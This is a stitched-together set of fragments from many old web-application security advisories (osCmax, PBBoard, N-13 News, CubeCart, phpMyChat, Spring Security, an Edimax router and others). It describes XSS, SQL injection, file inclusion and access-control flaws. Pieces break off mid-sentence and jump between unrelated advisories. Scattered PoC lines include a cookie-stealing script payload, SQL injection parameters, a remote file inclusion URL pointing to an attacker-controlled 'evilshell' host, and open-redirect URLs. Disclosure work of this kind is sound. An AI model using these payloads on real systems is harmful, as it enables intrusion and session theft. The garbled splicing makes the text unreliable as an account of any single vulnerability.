and existing customers all over the world.
3. VULNERABILITY DESCRIPTION
Multiple parameters are not properly sanitized, which allows an attacker
to conduct a Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
###############################################################################
1. Local File Inclusion in "maincore.php"
###############################################################################
Reason: insufficient sanitization of user-supplied data
Attack vector: user-supplied POST parameter "user_theme"
Preconditions:
1. Logged in as valid user
2. "Allow users to change theme" option must be activated (it is by default)
3. PHP must be < 5.3.4 for null-byte attacks to work
2004.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows an attacker
to conduct a Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
Multiple vulnerabilities have been discovered in OpenX, which can be
exploited by malicious people to conduct cross-site scripting,
cross-site request forgery, and file inclusion attacks and by
malicious users to conduct script insertion and SQL injection attacks.
1) Input passed to the "clientid" parameter in "www/admin/banner-acl.php",
"www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-banners.php",
and "www/admin/banner-activate.php" is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
###############################################################################
2. SQL Injection Vulnerability in "documenthandler.php"
###############################################################################
Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied POST parameter "prefix"
Preconditions: Logged in as admin with FoxyPress product editing privileges
Php script "documenthandler.php" line 14:
------------------------[ source code start ]----------------------------------
Type of vulnerability: Cross-Site Scripting (XSS) - Reflected
Exploit Vectors: Local and Remote
Vulnerability Description: The Web application management interface of Server Monitor contains multiple injection points, which allow for execution of Cross-site Scripting (XSS) attacks. Arbitrary client-side code such as JavaScript can be injected into certain parameters throughout the Web application. The following parameters and Web pages have been tested and verified; however, it is likely that more views and parameters within the application are vulnerable:
event-history.asp (siteid, type) parameters
admin-history.asp (siteid, type) parameters
dashboard-view.asp (siteid, id) parameters
device-events.asp (siteid, dn) parameters
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change the password of an arbitrary user and create arbitrary files in the folder of the vulnerable application.
1) Multiple SQL Injections in PBBoard: CVE-2012-4034
1.1 Input passed via the "username" POST parameter to /index.php (when "id", "member" and "start" parameters are set, and "page" is set to "send") is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC (Proof of Concept) demonstrates the vulnerability:
1. SQL Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user-submitted parameter "origmsg" is used in an SQL query
Preconditions:
1. attacker must be logged in as valid user
Test:
Spring Security 2.0.0 to 2.0.5
Acegi Security 1.0.0 to 1.0.7
Description:
Spring Security does not consider URL path parameters when processing security constraints. By adding a URL path parameter to a request, an attacker may be able to bypass a security constraint. The root cause of this issue is a lack of clarity regarding the handling of path parameters in the Servlet Specification (see below). Some Servlet containers include path parameters in the value returned for getPathInfo() and some do not. Spring Security uses the value returned by getPathInfo() as part of the process of mapping requests to security constraints. The unexpected presence of path parameters can cause a constraint to be bypassed.
Users of Apache Tomcat (all current versions) are not affected by this vulnerability since Tomcat follows the guidance previously provided by the Servlet Expert group and strips path parameters from the value returned by getContextPath(), getServletPath() and getPathInfo().
Users of SpringSource tc Server (all versions) are not affected. tc Server uses Apache Tomcat and does not change the handling of path parameters.
Overview:
Various URLs within the deployed OpenCms application version 7.5.0 are
open to attacks, including Cross-Site Scripting, Phishing Through Frames
and Application Error. Some of these attacks allow injection of scripts
into a parameter in the request. The application should filter such
hazardous characters out of user input.
Example follows:
Vulnerable URL (from the OpenCms VFS):
/opencms/opencms/system/modules/org.opencms.workplace.help/jsptemplates/
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
###############################################################################
Reasons:
1. Insecure use of "parse_str()"
2. Uninitialized variable "$mainXML"
Attack vector: User-supplied POST parameters "settingsXML" and "mainXML"
Precondition: Logged in as admin with "FlAG Change skin" privileges
Php script "admin/skin_options.php" line:
------------------------[ source code start ]----------------------------------
III. ANALYSIS
Summary:
A) XSS Vulnerabilities
graph.php (view_type parameter)
graph_view.php (filter parameter)
index.php/login (action parameter)
index.php/login (login_username parameter)
B) Path Disclosure Vulnerabilities
graph.php (local_graph_id parameter)
for instant messaging to intelligently link people together.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows an attacker
to conduct a Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
"CubeCart is a fully featured ecommerce shopping cart solution used by
over a million store owners around the world."
The following web vulnerabilities were found in CubeCart version 4.3.3:
1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.
2. Cross-site Scripting vulnerability in
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.
3. Cross-site Scripting vulnerability in
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.
4. Cross-site Scripting vulnerability in
which can be exploited by malicious users to manipulate certain data,
conduct spoofing, SQL injection, and script insertion attacks and by
malicious people to conduct SQL injection and script insertion
attacks.
1) Input passed via the "login" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
Vulnerability Variant:
------------------
Injection "/home-f.asp","/opinions-f.asp" in "sitebid" parameter.
http://www.example.com/src=www.example.com/home-f.asp?sitebid=@@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
High-Tech Bridge Security Research Lab has discovered multiple Cross-Site Scripting (XSS) vulnerabilities in Kajona.
1) Multiple Cross-Site Scripting (XSS) in Kajona: CVE-2012-3805
1.1 Input passed via the "absender_name", "absender_email" and "absender_nachricht" GET parameters to /index.php (when "page" is set to "contact") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerabilities:
EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18&pl1_id=1
============ Vulnerability Overview: ============
* URL Redirection:
Parameter: submit-url and wlan_url
http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de
http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=test&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=57&y=20&wlan-url=http://www.pwnd.pwnd
###############################################################################
Reason:
1. insufficient sanitization of user data before use in preg_replace
Attack vectors:
1. user-supplied parameters "from_prefix" and "to_prefix"
Preconditions:
1. logged in as valid PMA user
2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex)
PMA security advisory: PMASA-2013-2
<param name="itemid" value="860;941" />
<param name="language" value="" />
<param name="os" value="" />
</object>
The Service-URL parameter specifies the URL from which additional
configuration parameters are obtained, including the URL from which the
executable can be obtained. The other parameters are appended to this
URL and are used to supply additional information about the product that
has to be downloaded. The language and os parameters are automatically
set by the ActiveX control if they are not provided. The parameter
| Remote File Inclusion: |
----------------------------
http://localhost/path_to_phpMychat/chat/users_popupL.php3
Parameter = From
POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://evilshell
2.1.1. Exploit:
Check the exploit section.
2.2. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site info, such as the admin email address.
2.2.1. Exploit:
Check the exploit section.
2.3. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters)
2.3.1. Exploit:
Check the exploit section.
2.4. Failure to Restrict URL Access [in "mailPage.asp"]. Everyone can mailbomb others.
2.4.1. Exploit:
Check the exploit section.
[+] Introduction
Pandora FMS (for Pandora Flexible Monitoring System) is a software
solution for monitoring computer networks. It allows visual monitoring
of the status and performance of several parameters from different
operating systems, servers, applications and hardware systems such as
firewalls, proxies, databases, web servers or routers.
It can be deployed on almost any operating system. It features remote
monitoring (WMI, SNMP, TCP, UDP, ICMP, HTTP...) and it can also use
###############################################################################
1. Local File Inclusion in "action.php"
###############################################################################
Reason: using unsanitized user submitted data for file operations
Attack vector: user-submitted GET parameter "route"
Preconditions:
1. Windows platform
2. PHP version must be < 5.3.4 for null-byte attacks to work
Result: remote file disclosure, PHP remote code execution
Affected Versions
------------------------------------------------------------
Each vulnerability was confirmed in versions 2.4.103 and 2.5.139-beta.
The Cross Site Scripting vulnerability affecting the redirect
parameter is only found in version 2.5.139-beta.
Proof of Concept
####################
ACADEMIC WEB TOOLS (AWT) yektaweb is a Persian content management system (CMS) which can also manage university conferences and journals.
####################
2. Vulnerabilities:
####################
2.1. Directory Traversal in "/download.php" in "dfile" parameter.
2.1.1. Exploit:
Check the exploit/POC section.
2.2. Injection Flaws. SQL Injection in "/rating.php" in "book_id" parameter.
2.2.1. Exploit:
Check the exploit/POC section.